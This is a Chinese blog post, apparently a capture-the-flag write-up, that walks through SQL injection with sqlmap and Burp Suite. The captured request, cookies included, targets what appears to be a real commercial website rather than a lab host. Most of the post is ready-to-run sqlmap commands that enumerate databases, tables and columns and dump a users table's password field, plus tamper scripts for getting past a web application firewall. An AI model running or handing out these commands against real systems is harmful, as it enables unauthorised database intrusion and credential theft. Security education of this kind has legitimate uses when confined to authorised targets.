SQLMAP 脚本自动注入应用(burpsuit辅助)
2016-08-06 15:02
603 查看
一道nctf的注入题目
具体的步骤如下:
sqlmap注入命令1
sqlmap注入命令2
执行语句
利用这句代码报数据库内容
爆出了数据库
或者利用下面代码爆出当前使用的数据库
当前使用的数据库为’db1052699_bsc’
看到了users的数据表,接下来下面就来爆字段啦
看到了password字段,接下来就要爆内容啦
密码被爆破出来啦
具体的步骤如下:
sqlmap注入命令1
sqlmap注入命令2
第一步 burpsuit获取报头
运用burpsuit抓包,获取http报头GET /services.php?id=4 HTTP/1.1 Host: www.backstagecommerce.ca Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: __cfduid=d8e66c3c7470ab2dae745171ba4dccd181469886263; _ga=GA1.2.1383706248.1469886265 Connection: close
第二步 报头存档
这一步将上面内容存在test.txt里面第三步 爆出现在使用的数据库
利用sqlmap,进行自动注入执行语句
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dbs //-p 跟的是参数这里为id 想要暴库就输入--dbs
利用这句代码报数据库内容
爆出了数据库
或者利用下面代码爆出当前使用的数据库
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --current-db
当前使用的数据库为’db1052699_bsc’
第四步 爆出数据库中有用的数据表
利用下面语句爆数据库里的数据表sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --tables -D "db1052699_bsc"
看到了users的数据表,接下来下面就来爆字段啦
第五步 爆数据表中的字段
利用下面语句爆字段sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --columns -T "users" -D "db1052699_bsc"
看到了password字段,接下来就要爆内容啦
第六步 爆出有用字段的内容
最后一步爆字段内容sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dump -T "users" -D "db1052699_bsc" -C "password"
密码被爆破出来啦
--bacth自动化
--tamper=charencode.py,modsecurityversioned.py,randomcase.py,space2morehash.py,varnish.py加入绕过
相关文章推荐
- Burpsuite+SQLMAP双璧合一绕过Token保护的应用进行注入攻击
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT
- Sql2005注入辅助脚本[修改版]
- sqlmap自动注入
- SQLMAP自动注入-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION优化
- Android Accessibility(辅助功能) --实现Android应用自动安装、卸载
- Android Accessibility(辅助功能) --实现Android应用自动安装、卸载、强行停止
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- xssshell平台使用以及Burpsuit 抓包辅助查过滤
- Android Accessibility(辅助功能) --实现Android应用自动安装、卸载
- Shell脚本高级应用 --实现远程MySQL自动查询[转
- SQLMAP自动注入(一):sqlmap的简单使用和配合burpsuite使用
- bash应用实例--交互式进程(如telnet)的自动处理脚本
- shell脚本秒级自动执行之crontab完美应用
- python脚本设置微信自动回复[简单应用]
- Android Accessibility(辅助功能) --实现Android应用自动安装、卸载 .
- 【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、M
- android 应用 Ant脚本自动编译、打包、代码混淆、签名、安装等
- 【安全牛学习笔记】SQLMAP- 自动注入